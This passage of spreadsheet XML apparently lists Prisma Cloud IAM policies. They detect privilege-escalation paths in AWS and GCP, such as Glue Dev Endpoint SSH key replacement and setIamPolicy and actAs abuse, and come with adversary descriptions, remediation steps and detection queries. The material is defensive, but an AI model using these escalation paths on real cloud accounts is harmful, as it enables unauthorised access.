          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('iam:PassRole','lambda:CreateFunction', 'lambda:InvokeFunction') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance' AND source.cloud.type = 'AWS'</t>
        </is>
      </c>
      <c r="AA3231" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3231" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3231" t="inlineStr"/>
      <c r="AD3231" t="b">
        <v>1</v>
      </c>
      <c r="AE3231" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3231" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>2544873b-2656-474c-b0ee-be161be727fb</t>
        </is>
      </c>
      <c r="AI3231" t="inlineStr">
        <is>
          <t>2544873b-2656-474c-b0ee-be161be727fb</t>
        </is>
      </c>
      <c r="AJ3231" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3231" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3232">
      <c r="A3232" t="inlineStr"/>
      <c r="B3232" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3232" s="2" t="inlineStr"/>
      <c r="D3232" t="n">
        <v>0</v>
      </c>
      <c r="E3232" t="n">
        <v>167</v>
      </c>
      <c r="F3232" t="n">
        <v>0</v>
      </c>
      <c r="G3232" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3232" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3232" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via Glue Dev Endpoint permissions</t>
        </is>
      </c>
      <c r="L3232" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3232" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3232" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3232" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3232" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3232" t="inlineStr"/>
      <c r="R3232" t="inlineStr"/>
      <c r="S3232" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3232" t="b">
        <v>1</v>
      </c>
      <c r="U3232" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3232" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3232" t="inlineStr">
        <is>
          <t>With access to the glue:UpdateDevEndpoint permission, an adversary can update the existing SSH key associated with the glue endpoint. This will allow the adversary to SSH into the host and gain access to IAM credentials associated with the role attached to the glue endpoint. Though not required, it may be helpful to have the glue:GetDevEndpoint permission as well, if the existing endpoint cannot be identified via other means.</t>
        </is>
      </c>
      <c r="X3232" t="inlineStr">
        <is>
          <t>"When using iam:PassRole with any service, it should be scoped to only the resources required to pass the role to minimize the risk of privilege escalation. Follow these recommendations:
For the iam:PassRole policy statement section:
- Use the AWS pass-to service condition to only the service the role is being passed.
- Reduce and, if possible, eliminate the usage of * in the resource section by scoping to a single role
For the allowed services actions policy statement section:
- Reduce and, if possible, eliminate the usage of * in the resource section by scoping to a single resource or small group of resources
Remediation for a user:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
----------------------------------------
Remediation for a Compute instance/Okta user that assumes a role:
1. Log in to the AWS console
2. Navigate to the compute service (For example, AWS EC2, AWS Lambda, or AWS ECS) or login to the Okta console
3. Find the role used by the compute instance/Okta user
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
----------------------------------------
Remediation for a Resource-based Policy:
1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Remove the risky actions according to the alert details"</t>
        </is>
      </c>
      <c r="Y323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aws cli commands'</t>
        </is>
      </c>
      <c r="Z3232" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'glue:UpdateDevEndpoint', 'glue:GetDevEndpoint' ) AND dest.cloud.wildcardscope = true</t>
        </is>
      </c>
      <c r="AA3232" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3232" t="inlineStr">
        <is>
          <t>2023-07-21 07:35:44</t>
        </is>
      </c>
      <c r="AC3232" t="inlineStr"/>
      <c r="AD3232" t="b">
        <v>1</v>
      </c>
      <c r="AE3232" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3232" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>ad0685b6-49fc-4868-a424-b8bb8c962fd3</t>
        </is>
      </c>
      <c r="AI3232" t="inlineStr">
        <is>
          <t>ad0685b6-49fc-4868-a424-b8bb8c962fd3</t>
        </is>
      </c>
      <c r="AJ3232" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3232" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3233">
      <c r="A3233" t="inlineStr"/>
      <c r="B3233" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3233" s="2" t="inlineStr"/>
      <c r="D3233" t="inlineStr"/>
      <c r="E3233" t="inlineStr"/>
      <c r="F3233" t="inlineStr"/>
      <c r="G3233" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3233" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3233" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Cloud Run Jobs IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3233" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3233" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3233" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3233" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3233" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3233" t="inlineStr"/>
      <c r="R3233" t="inlineStr"/>
      <c r="S3233" t="inlineStr"/>
      <c r="T3233" t="b">
        <v>1</v>
      </c>
      <c r="U3233" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3233" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3233" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Run Jobs,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33" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y323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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'run.jobs.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3233" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3233" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3233" t="inlineStr"/>
      <c r="AD3233" t="b">
        <v>1</v>
      </c>
      <c r="AE3233" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3233" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>063eaecc-c487-40d9-a575-cf597645ee80</t>
        </is>
      </c>
      <c r="AI3233" t="inlineStr">
        <is>
          <t>063eaecc-c487-40d9-a575-cf597645ee80</t>
        </is>
      </c>
      <c r="AJ3233" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3233" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3234">
      <c r="A3234" t="inlineStr"/>
      <c r="B3234" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3234" s="2" t="inlineStr"/>
      <c r="D3234" t="inlineStr"/>
      <c r="E3234" t="inlineStr"/>
      <c r="F3234" t="inlineStr"/>
      <c r="G3234" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3234" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3234" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Resource Manager Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3234" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3234" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3234" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3234" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3234" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3234" t="inlineStr"/>
      <c r="R3234" t="inlineStr"/>
      <c r="S3234" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3234" t="b">
        <v>1</v>
      </c>
      <c r="U3234" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3234" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3234" t="inlineStr">
        <is>
          <t>An adversary able to edit IAM Policies at the organization, folder or project levels could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3234" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y323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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name IN ('resourcemanager.organizations.setIamPolicy', 'resourcemanager.folders.setIamPolicy', 'resourcemanager.projects.setIamPolicy')</t>
        </is>
      </c>
      <c r="AA3234" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3234" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3234" t="inlineStr"/>
      <c r="AD3234" t="b">
        <v>1</v>
      </c>
      <c r="AE3234" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3234" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>ab9e5269-5014-48e6-b293-a318100aa535</t>
        </is>
      </c>
      <c r="AI3234" t="inlineStr">
        <is>
          <t>ab9e5269-5014-48e6-b293-a318100aa535</t>
        </is>
      </c>
      <c r="AJ3234" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3234" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3235">
      <c r="A3235" t="inlineStr"/>
      <c r="B3235" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3235" s="2" t="inlineStr"/>
      <c r="D3235" t="inlineStr"/>
      <c r="E3235" t="inlineStr"/>
      <c r="F3235" t="inlineStr"/>
      <c r="G3235" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3235" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3235" t="inlineStr">
        <is>
          <t>GCP User with IAM write access level permissions</t>
        </is>
      </c>
      <c r="L3235" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3235" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3235" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3235" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3235" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3235" t="inlineStr"/>
      <c r="R3235" t="inlineStr"/>
      <c r="S3235" t="inlineStr"/>
      <c r="T3235" t="b">
        <v>1</v>
      </c>
      <c r="U3235" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3235" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3235" t="inlineStr">
        <is>
          <t>This policy identifies IAM write permissions that are defined as risky permissions. Ensure that the IAM Users in your GCP account don't have a risky set of write permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3235" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the IAM service.
3 Find the binding between the user and the role
4. Find the role used by the service account.
6 Remove binding with the role with risky permissions.
7 Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y323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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and action.name in ('accessapproval.requests.approve','accessapproval.requests.dismiss','accessapproval.settings.delete','accessapproval.settings.update','accesscontextmanager.accessLevels.create','accesscontextmanager.accessLevels.delete','accesscontextmanager.accessLevels.replaceAll','accesscontextmanager.accessLevels.update','accesscontextmanager.accessPolicies.create','accesscontextmanager.accessPolicies.delete','accesscontextmanager.accessPolicies.setIamPolicy','accesscontextmanager.accessPolicies.update','accesscontextmanager.gcpUserAccessBindings.create','accesscontextmanager.gcpUserAccessBindings.delete','accesscontextmanager.gcpUserAccessBindings.update','accesscontextmanager.policies.create','accesscontextmanager.policies.delete','accesscontextmanager.policies.setIamPolicy','accesscontextmanager.policies.update','iam.roles.create','iam.roles.delete','iam.roles.undelete', 'iam.roles.update','iam.serviceAccounts.getAccessToken','iam.serviceAccountKeys.create','iam.serviceAccountKeys.delete','iam.serviceAccounts.create','iam.serviceAccounts.delete','iam.serviceAccounts.disable','iam.serviceAccounts.enable','iam.serviceAccounts.setIamPolicy','iam.serviceAccounts.undelete','iam.serviceAccounts.update','iam.serviceAccounts.implicitDelegation','iam.serviceAccounts.signBlob','iam.serviceAccounts.signJwt','iam.serviceAccounts.actAs')</t>
        </is>
      </c>
      <c r="AA3235" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3235" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3235" t="inlineStr"/>
      <c r="AD3235" t="b">
        <v>1</v>
      </c>
      <c r="AE3235" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3235" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>309d1863-c8c7-4ff1-b7a8-454817c876d9</t>
        </is>
      </c>
      <c r="AI3235" t="inlineStr">
        <is>
          <t>309d1863-c8c7-4ff1-b7a8-454817c876d9</t>
        </is>
      </c>
      <c r="AJ3235" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3235" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3236">
      <c r="A3236" t="inlineStr"/>
      <c r="B3236" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3236" s="2" t="inlineStr"/>
      <c r="D3236" t="inlineStr"/>
      <c r="E3236" t="inlineStr"/>
      <c r="F3236" t="inlineStr"/>
      <c r="G3236" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3236" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3236" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Resource Manager Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3236" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3236" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3236" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3236" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3236" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3236" t="inlineStr"/>
      <c r="R3236" t="inlineStr"/>
      <c r="S3236" t="inlineStr"/>
      <c r="T3236" t="b">
        <v>1</v>
      </c>
      <c r="U3236" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3236" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3236" t="inlineStr">
        <is>
          <t>An adversary able to edit IAM Policies at the organization, folder or project levels could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3236" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y323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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name IN ('resourcemanager.organizations.setIamPolicy', 'resourcemanager.folders.setIamPolicy', 'resourcemanager.projects.setIamPolicy')</t>
        </is>
      </c>
      <c r="AA3236" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3236" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3236" t="inlineStr"/>
      <c r="AD3236" t="b">
        <v>1</v>
      </c>
      <c r="AE3236" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3236" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>6d3a90cd-8a90-4c98-bd9a-65f00f79d7fd</t>
        </is>
      </c>
      <c r="AI3236" t="inlineStr">
        <is>
          <t>6d3a90cd-8a90-4c98-bd9a-65f00f79d7fd</t>
        </is>
      </c>
      <c r="AJ3236" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3236" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3237">
      <c r="A3237" t="inlineStr"/>
      <c r="B3237" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3237" s="2" t="inlineStr"/>
      <c r="D3237" t="inlineStr"/>
      <c r="E3237" t="inlineStr"/>
      <c r="F3237" t="inlineStr"/>
      <c r="G3237" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3237" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3237" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Cloud Function Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3237" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3237" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3237" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3237" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3237" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3237" t="inlineStr"/>
      <c r="R3237" t="inlineStr"/>
      <c r="S3237" t="inlineStr"/>
      <c r="T3237" t="b">
        <v>1</v>
      </c>
      <c r="U3237" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3237" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3237" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. By creating Cloud Function instances with service account impersonation privileges, the attacker can escalate their permissions. This enables the creation of instances that perform actions under the guise of the impersonated service account, further allowing the attacker to enumerate and exploit the environment.</t>
        </is>
      </c>
      <c r="X3237" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y323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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3237" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3237" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3237" t="inlineStr"/>
      <c r="AD3237" t="b">
        <v>1</v>
      </c>
      <c r="AE3237" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3237" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>213a74d0-ad27-42af-bf35-2b34142177b9</t>
        </is>
      </c>
      <c r="AI3237" t="inlineStr">
        <is>
          <t>213a74d0-ad27-42af-bf35-2b34142177b9</t>
        </is>
      </c>
      <c r="AJ3237" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3237" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3238">
      <c r="A3238" t="inlineStr"/>
      <c r="B3238" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3238" s="2" t="inlineStr"/>
      <c r="D3238" t="inlineStr"/>
      <c r="E3238" t="inlineStr"/>
      <c r="F3238" t="inlineStr"/>
      <c r="G3238" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3238" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3238" t="inlineStr">
        <is>
          <t>GCP service accounts with 'Owner' role on org level</t>
        </is>
      </c>
      <c r="L3238" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3238" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3238" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3238" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3238" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3238" t="inlineStr"/>
      <c r="R3238" t="inlineStr"/>
      <c r="S3238" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3238" t="b">
        <v>0</v>
      </c>
      <c r="U3238" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3238" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3238" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Owner' on organization level that is defined as risky role. Ensure that the service accounts in your GCP environment don't have a risky 'Owner' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3238" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization
 3. Navigate to the IAM service
 4. Find the binding between the service account  and the "Owner" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3238" t="inlineStr"/>
      <c r="Z3238" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and grantedby.cloud.entity.type = 'serviceAccount' and grantedby.cloud.policy.name = 'Owner' and grantedby.level.type = 'GCP Organization'</t>
        </is>
      </c>
      <c r="AA3238" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3238" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3238" t="inlineStr"/>
      <c r="AD3238" t="b">
        <v>1</v>
      </c>
      <c r="AE3238" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3238" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>8de6c50e-3d48-495e-9f92-63c0c11e9e2a</t>
        </is>
      </c>
      <c r="AI3238" t="inlineStr">
        <is>
          <t>8de6c50e-3d48-495e-9f92-63c0c11e9e2a</t>
        </is>
      </c>
      <c r="AJ3238" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3238" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3239">
      <c r="A3239" t="inlineStr"/>
      <c r="B3239" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3239" s="2" t="inlineStr"/>
      <c r="D3239" t="inlineStr"/>
      <c r="E3239" t="inlineStr"/>
      <c r="F3239" t="inlineStr"/>
      <c r="G3239" t="b">
        <v>1</v>
      </c>
      <c r="H32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39" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3239" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3239" t="inlineStr">
        <is>
          <t>GCP Cloud Run Job Public Execution via Default Compute SA Modification</t>
        </is>
      </c>
      <c r="L3239" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M3239" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3239" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3239" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3239" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3239" t="inlineStr"/>
      <c r="R3239" t="inlineStr"/>
      <c r="S3239" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3239" t="b">
        <v>1</v>
      </c>
      <c r="U3239" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3239" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3239" t="inlineStr">
        <is>
          <t>Entities with run.jobs.setIamPolicy permission can modify IAM policies to grant rights (e.g. run.jobs.create, run.jobs.run ) over Cloud Jobs, enabling the execution of malicious jobs,that can lead to privilege escalation and lateral movement within cloud environments.</t>
        </is>
      </c>
      <c r="X3239" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service.
 3 Find the binding between the user and the role
 4. Find the role used by the service account.
 6 Remove binding with the role with risky permissions.
 7 Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y323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39" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND action.name contains all('run.jobs.setIamPolicy', 'iam.serviceAccounts.actAs') AND grantedby.cloud.policy.type != 'GCP Basic Role'</t>
        </is>
      </c>
      <c r="AA3239" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3239" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3239" t="inlineStr"/>
      <c r="AD3239" t="b">
        <v>1</v>
      </c>
      <c r="AE3239" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3239" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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39" t="inlineStr">
        <is>
          <t>7d0fb1b6-a64b-4ac8-90b8-42cfd737c258</t>
        </is>
      </c>
      <c r="AI3239" t="inlineStr">
        <is>
          <t>7d0fb1b6-a64b-4ac8-90b8-42cfd737c258</t>
        </is>
      </c>
      <c r="AJ3239" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3239" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3240">
      <c r="A3240" t="inlineStr"/>
      <c r="B3240" s="2" t="inlineStr">
        <is>
